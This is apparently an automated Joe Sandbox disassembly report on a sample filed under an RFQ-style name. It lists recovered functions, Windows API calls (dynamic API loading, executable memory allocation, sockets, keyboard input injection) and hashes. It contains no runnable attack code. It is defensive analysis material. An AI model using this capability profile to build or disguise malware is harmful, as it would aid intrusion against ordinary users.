                                              • String ID: msctls_trackbar32
                                              • API String ID: 3850602802-1010561917
                                              • Opcode ID: ec8df5c5f021dd87cb0cfd35d24834f78a111afcf97f2b0fd228b74971c3b910
                                              • Instruction ID: d4a20c79bde2c4c80a8762e809d746ccfa166411e5989ccb729cf4fd9e90934d
                                              • Opcode Fuzzy Hash: ec8df5c5f021dd87cb0cfd35d24834f78a111afcf97f2b0fd228b74971c3b910
                                              • Instruction Fuzzy Hash: F011E372244208BAEF149FB0DC45FEB37A9EF89768F160519FA51A70E1D371A861CB60
                                              APIs
                                              • GetWindowTextLengthW.USER32(00000000), ref: 00166C11
                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00166C20
                                              Strings
                                              Similarity
                                              • API ID: LengthMessageSendTextWindow
                                              • String ID: @U=u$edit
                                              • API String ID: 2978978980-590756393
                                              • Opcode ID: e297655c99fc09e653b6494845b557fdc3763951b4e88026fff24e23ac91646f
                                              • Instruction ID: 2e314f4f67040c65f31ed0cfee57a9b621ab543c1fa5d788f3cb885738060975
                                              • Opcode Fuzzy Hash: e297655c99fc09e653b6494845b557fdc3763951b4e88026fff24e23ac91646f
                                              • Instruction Fuzzy Hash: 09118C71604208ABEB108F64DC41AFB3769EB15378F204728F961D71E0C775DCA19B60
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 0013B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0013B0E7
                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00139355
                                              Strings
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: @U=u$ComboBox$ListBox
                                              • API String ID: 372448540-2258501812
                                              • Opcode ID: aa919802bb7d8c8126ad894e0e1e4e975d858b896bdb8515ee7619e4f754b6e1
                                              • Instruction ID: e06af53a278592ad8234217fb2a8481161187e56943707ae6d53a8a3d67a388b
                                              • Opcode Fuzzy Hash: aa919802bb7d8c8126ad894e0e1e4e975d858b896bdb8515ee7619e4f754b6e1
                                              • Instruction Fuzzy Hash: 8301B1B1A05214ABDF08EBB5CC918FF7769FF46320F150A29F932672D2EB7159088660
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 0013B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0013B0E7
                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 0013924D
                                              Strings
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: @U=u$ComboBox$ListBox
                                              • API String ID: 372448540-2258501812
                                              • Opcode ID: 330bf62c4f899f203fa81e04111c1395ddb652ccff2026ca6a4df843a5fc1cc8
                                              • Instruction ID: d0309066e1a2a43deb66b3b30a2da9bc3fb529b1b998bbd4041a87d24cd43109
                                              • Opcode Fuzzy Hash: 330bf62c4f899f203fa81e04111c1395ddb652ccff2026ca6a4df843a5fc1cc8
                                              • Instruction Fuzzy Hash: BC018471A45204BBDF08EBA4C992DFF73A89F55300F150029B91677292EB515E0C96B1
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 0013B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0013B0E7
                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 001392D0
                                              Strings
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: @U=u$ComboBox$ListBox
                                              • API String ID: 372448540-2258501812
                                              • Opcode ID: 90ad0ea03b9acd29332421195a714c6287b5d221a4bb4027f684e50773ae843a
                                              • Instruction ID: 35d8c60707eef6de5f2b6940223a60a72449a335d99e9f04a22992d124260738
                                              • Opcode Fuzzy Hash: 90ad0ea03b9acd29332421195a714c6287b5d221a4bb4027f684e50773ae843a
                                              • Instruction Fuzzy Hash: 9301D671A452087BDF04EBA4CD82EFF77AC9F15300F290129B92277282EB615F0C9672
                                              APIs
                                              • GetForegroundWindow.USER32(?,001A67B0,0016DB17,000000FC,?,00000000,00000000,?,?,?,0011BBB9,?,?,?,?,?), ref: 0016AF8B
                                              • GetFocus.USER32 ref: 0016AF93
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                                • Part of subcall function 000E25DB: GetWindowLongW.USER32(?,000000EB), ref: 000E25EC
                                              • SendMessageW.USER32(00F1EBE8,000000B0,000001BC,000001C0), ref: 0016B005
                                              Strings
                                              Similarity
                                              • API ID: Window$Long$FocusForegroundMessageSend
                                              • String ID: @U=u
                                              • API String ID: 3601265619-2594219639
                                              • Opcode ID: 691e5bf544202ea4b42fe336ae33c65fd902e44686f873917327d967798cc0e4
                                              • Instruction ID: 5b789e45aaf2456c060c8215e47cf0a0b0cea26cf7a918d489a14a97813fbc0d
                                              • Opcode Fuzzy Hash: 691e5bf544202ea4b42fe336ae33c65fd902e44686f873917327d967798cc0e4
                                              • Instruction Fuzzy Hash: 140144352056109FC7249B38DCC4A6777E9EB8A324B18026DF426C72A1CB316C96CB50
                                              APIs
                                                • Part of subcall function 000F619A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000F61B1
                                              • SendMessageW.USER32(?,0000000C,00000000,?), ref: 000F61DF
                                              • GetParent.USER32(?), ref: 0013111F
                                              • InvalidateRect.USER32(00000000,?,000F3BAF,?,00000000,00000001), ref: 00131126
                                              Strings
                                              Similarity
                                              • API ID: MessageSend$InvalidateParentRectTimeout
                                              • String ID: @U=u
                                              • API String ID: 3648793173-2594219639
                                              • Opcode ID: 6fd77e8fc52a6b84273c2cc2d531b59eb05ae7e6ffdcfa90e5f09dfa38f2d582
                                              • Instruction ID: 1c5dadbe5fa4783b5c84634dd96841e32ce5b0e39a438c62a6db907e05580c89
                                              • Opcode Fuzzy Hash: 6fd77e8fc52a6b84273c2cc2d531b59eb05ae7e6ffdcfa90e5f09dfa38f2d582
                                              • Instruction Fuzzy Hash: 8CF03035104208FBEF201F60EC09FA57BA8BB15754F285539F6419A8B2C6A75891BB60
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,000E4C2E), ref: 000E4CA3
                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000E4CB5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                              • API String ID: 2574300362-192647395
                                              • Opcode ID: 7d15ba560b1ad7f62a61bc3ab5b00837a481867b1dba3efe988620410f908317
                                              • Instruction ID: 503bcbd53964859122d5f69ca47f0eb7327fc39e66ff160fa47b552ac80a123b
                                              • Opcode Fuzzy Hash: 7d15ba560b1ad7f62a61bc3ab5b00837a481867b1dba3efe988620410f908317
                                              • Instruction Fuzzy Hash: E8D01730510723CFD7609F32EE1960676E5AF06791B228C3ED886E6550E7B0D8C1CA50
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,000E4D2E,?,000E4F4F,?,001A62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000E4D6F
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000E4D81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-3689287502
                                              • Opcode ID: 350299455038407b677d5dbb5a838002e8455ecc3100c9e646fcafcd19afacc6
                                              • Instruction ID: 84f140b8b8855d0da4bdd6bd5dd706f9d72bf67c5f268494cb97151bc4bea518
                                              • Opcode Fuzzy Hash: 350299455038407b677d5dbb5a838002e8455ecc3100c9e646fcafcd19afacc6
                                              • Instruction Fuzzy Hash: A4D05E30514753CFDB209F32EC0865676E8BF1A392B15C83EE886E6A90E7B0D8C0CA50
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,000E4CE1,?), ref: 000E4DA2
                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000E4DB4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-1355242751
                                              • Opcode ID: 99c2f2bcd52a222f0e993826de9779f105eab193365f8175d3ca02af49323a7d
                                              • Instruction ID: 24bf06315718e61c88c582c46a7b3ce97ea09d12e8f13e8218d6fac77da13538
                                              • Opcode Fuzzy Hash: 99c2f2bcd52a222f0e993826de9779f105eab193365f8175d3ca02af49323a7d
                                              • Instruction Fuzzy Hash: 71D01731554713CFDB209F32EC08B8676E4EF06395B16883EE8C6E6590E7B0D8C0CA50
                                              APIs
                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,001612C1), ref: 00161080
                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00161092
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 2574300362-4033151799
                                              • Opcode ID: ee1e8082dcf606921c1cf78f814edf38d5ba042daf54017c0a0321de39687b5c
                                              • Instruction ID: 813a8a3ba309b54843797e281be6d1628498cf604ab1135c679633db7a7e5d95
                                              • Opcode Fuzzy Hash: ee1e8082dcf606921c1cf78f814edf38d5ba042daf54017c0a0321de39687b5c
                                              • Instruction Fuzzy Hash: 43D01730510712DFDB209F35ED58A1A76E5EF067A1B15DC3EE88ADA550E7B0D8C0CA50
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00159009,?,0016F910), ref: 00159403
                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00159415
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetModuleHandleExW$kernel32.dll
                                              • API String ID: 2574300362-199464113
                                              • Opcode ID: c9416c0f270f436e2fa7e16d768828570e8aca425c08516faec20288a67ce645
                                              • Instruction ID: 51980fa7ff5eca0de2cf8b12e59fd440457ccbd79f8136ce69f65c18268db85c
                                              • Opcode Fuzzy Hash: c9416c0f270f436e2fa7e16d768828570e8aca425c08516faec20288a67ce645
                                              • Instruction Fuzzy Hash: 1BD01774614713CFDB209F31EE0860676E5AF06392B11C83EE896DA950E7B0C8C9DA51
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cab4d43dbb1def2ee3ffa5f8640dd9c07de26a641b070bd30d4129374d44f7ca
                                              • Instruction ID: b64dc7e2ca16bd6b1eab431a6f9a7ac30a4a242af259c745abe6537d2ff944de
                                              • Opcode Fuzzy Hash: cab4d43dbb1def2ee3ffa5f8640dd9c07de26a641b070bd30d4129374d44f7ca
                                              • Instruction Fuzzy Hash: 6AC15DB5A04216EFDB24CF94C888EAEB7B5FF48714F158598E805EB291D730ED81DB90
                                              APIs
                                              • CharLowerBuffW.USER32(?,?), ref: 0015E3D2
                                              • CharLowerBuffW.USER32(?,?), ref: 0015E415
                                                • Part of subcall function 0015DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0015DAD9
                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0015E615
                                              • _memmove.LIBCMT ref: 0015E628
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                              • String ID:
                                              • API String ID: 3659485706-0
                                              • Opcode ID: 291d2b5c4a02d83f208fc18a2a22d3e19e1581131435bb129a109ac1963657ce
                                              • Instruction ID: 4ece982f030d7ea556f18d25f0a0bcbe80900d1d0e604848f8c10acfa1e59d4e
                                              • Opcode Fuzzy Hash: 291d2b5c4a02d83f208fc18a2a22d3e19e1581131435bb129a109ac1963657ce
                                              • Instruction Fuzzy Hash: 87C14B71A08351DFC718DF28C48095ABBE4FF88714F14896DF8A99B351D771EA49CB82
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 001583D8
                                              • CoUninitialize.OLE32 ref: 001583E3
                                                • Part of subcall function 0013DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0013DAC5
                                              • VariantInit.OLEAUT32(?), ref: 001583EE
                                              • VariantClear.OLEAUT32(?), ref: 001586BF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                              • String ID:
                                              • API String ID: 780911581-0
                                              • Opcode ID: f9db9450390d5e0a819559af3f6d698b128a23fb3df0377d0f155017a8555da1
                                              • Instruction ID: 99b8af78643aa901c7552bf1bfca555f632e0d81c722c79577dc23e7c7ca3ff4
                                              • Opcode Fuzzy Hash: f9db9450390d5e0a819559af3f6d698b128a23fb3df0377d0f155017a8555da1
                                              • Instruction Fuzzy Hash: 88A12675204741DFCB10EF19C881A6AB7E4BF88315F15445CF9AAAB3A2DB30ED44CB82
                                              APIs
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00172C7C,?), ref: 00137C32
                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00172C7C,?), ref: 00137C4A
                                              • CLSIDFromProgID.OLE32(?,?,00000000,0016FB80,000000FF,?,00000000,00000800,00000000,?,00172C7C,?), ref: 00137C6F
                                              • _memcmp.LIBCMT ref: 00137C90
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FromProg$FreeTask_memcmp
                                              • String ID:
                                              • API String ID: 314563124-0
                                              • Opcode ID: 033562c24d1d63f5b78b28a20dde9b7a2dab4a71df615f882b662295575e01d8
                                              • Instruction ID: deda909f73ae69ab56ee9af669070abbd0e0b1924836963a763c37140a4ec6d8
                                              • Opcode Fuzzy Hash: 033562c24d1d63f5b78b28a20dde9b7a2dab4a71df615f882b662295575e01d8
                                              • Instruction Fuzzy Hash: 14811C71A00109EFCB14DF94C984EEEB7B9FF89315F244598F515AB290DB71AE06CB60
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Variant$AllocClearCopyInitString
                                              • String ID:
                                              • API String ID: 2808897238-0
                                              • Opcode ID: 5eea4b1ddb78a56bd46dc0655a6293f7783ebe9f933a3f2125642fa44660d90d
                                              • Instruction ID: 69b31970b0055e3b90dd22c0c4d0018cbd1b686b174dd93d6e37ab778b66c519
                                              • Opcode Fuzzy Hash: 5eea4b1ddb78a56bd46dc0655a6293f7783ebe9f933a3f2125642fa44660d90d
                                              • Instruction Fuzzy Hash: 8D51E974608302AFDB38AF65E895A7EB3E8AF59310F20C81FF556DB6D1DB7098409B01
                                              APIs
                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00156CE4
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00156CF4
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00156D58
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00156D64
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorLast$__itow__swprintfsocket
                                              • String ID:
                                              • API String ID: 2214342067-0
                                              • Opcode ID: 1e83104817c168fa7171ef6997819d858c845d88b8882440052f2417d48b9ea8
                                              • Instruction ID: 8fd05e2a111fa568292bc650087868e11716990a92d6546a27d156a0cbf03573
                                              • Opcode Fuzzy Hash: 1e83104817c168fa7171ef6997819d858c845d88b8882440052f2417d48b9ea8
                                              • Instruction Fuzzy Hash: 6141AE75740200AFEB24AF25DC86F7A77A9AF44B10F44845CFA59AF2D3DBB09C018B91
                                              APIs
                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0016F910), ref: 001567BA
                                              • _strlen.LIBCMT ref: 001567EC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID:
                                              • API String ID: 4218353326-0
                                              • Opcode ID: d96a984c0d31562fcc5e15c1ee251dfecb5999e0f607a77290257610dbb3d6f9
                                              • Instruction ID: 31e71ed343610298abd95e87a78115402c2f05f8e5d511e041b065ccd3dcf9ba
                                              • Opcode Fuzzy Hash: d96a984c0d31562fcc5e15c1ee251dfecb5999e0f607a77290257610dbb3d6f9
                                              • Instruction Fuzzy Hash: 3741B331A00204EFCB14EB65DCC1FEEB7A9AF58315F548169F825AB292DB70AD48C790
                                              APIs
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0014BB09
                                              • GetLastError.KERNEL32(?,00000000), ref: 0014BB2F
                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0014BB54
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0014BB80
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                              • String ID:
                                              • API String ID: 3321077145-0
                                              • Opcode ID: 8968a6cb44f60105593bd93b4501296f6efaefaf865ea83ceed099c47097ff51
                                              • Instruction ID: 4449c9d94aec83bf582be939cba56770889d75368b85b126bdb54b0de664719a
                                              • Opcode Fuzzy Hash: 8968a6cb44f60105593bd93b4501296f6efaefaf865ea83ceed099c47097ff51
                                              • Instruction Fuzzy Hash: 7C410A39600650DFCB11EF19C585A5DBBE1EF89310B198498EC4AAB772CB74FD41CB91
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 0016AE1A
                                              • GetWindowRect.USER32(?,?), ref: 0016AE90
                                              • PtInRect.USER32(?,?,0016C304), ref: 0016AEA0
                                              • MessageBeep.USER32(00000000), ref: 0016AF11
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Rect$BeepClientMessageScreenWindow
                                              • String ID:
                                              • API String ID: 1352109105-0
                                              • Opcode ID: f180006836d23ac06cae0c7280b830c2a637fbc699e0d43793d3f99360bc8787
                                              • Instruction ID: b19a28d44cb23bfae8420790d68d0eea15ad6279ef163ab952da685b9723d635
                                              • Opcode Fuzzy Hash: f180006836d23ac06cae0c7280b830c2a637fbc699e0d43793d3f99360bc8787
                                              • Instruction Fuzzy Hash: 7941AB71600209DFCB11DF58DC84AA9BBF5FF49300F9880A9E814AB261D732A852CF92
                                              APIs
                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00141037
                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00141053
                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 001410B9
                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0014110B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
